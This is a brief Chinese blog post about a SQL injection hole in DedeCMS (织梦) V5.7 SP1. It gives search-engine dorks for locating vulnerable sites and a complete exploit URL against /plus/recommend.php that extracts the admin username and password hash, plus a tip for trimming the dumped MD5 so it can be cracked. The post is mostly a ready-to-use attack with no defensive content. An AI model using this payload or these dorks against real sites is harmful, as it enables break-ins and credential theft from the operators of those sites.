Hunter博客
QQ401209718
性别:男
爱好:女
兴趣:参透

Hunter丶Blog

DEDECMS(织梦)SQL注射漏洞

重点:Md5去除前三位和后一位。


关键字:inurl:login.php?dopost=showad

关键字:intex:Powered byDedeCMSV57_UTF8_SP1? 2004-2011 DesDev Inc.

关键字:intitle:织梦内容管理系统 V57_UTF8_SP1


利用的exp:/plus/recommend.php?action=&aid=1&_FILES[type][tmp_name]=\%27%20or%20mid=@`\%27`%20/*!50000union*//*!50000select*/1,2,3,(select%20CONCAT(0x7c,userid,0x7c,pwd)+from+`%23@__admin`%20limit+0,1),5,6,7,8,9%23@`\%27`+&_FILES[type][name]=1.jpg&_FILES[type][type]=application/octet-stream&_FILES[type][size]=4294

 

© Hunter丶Blog | Powered by LOFTER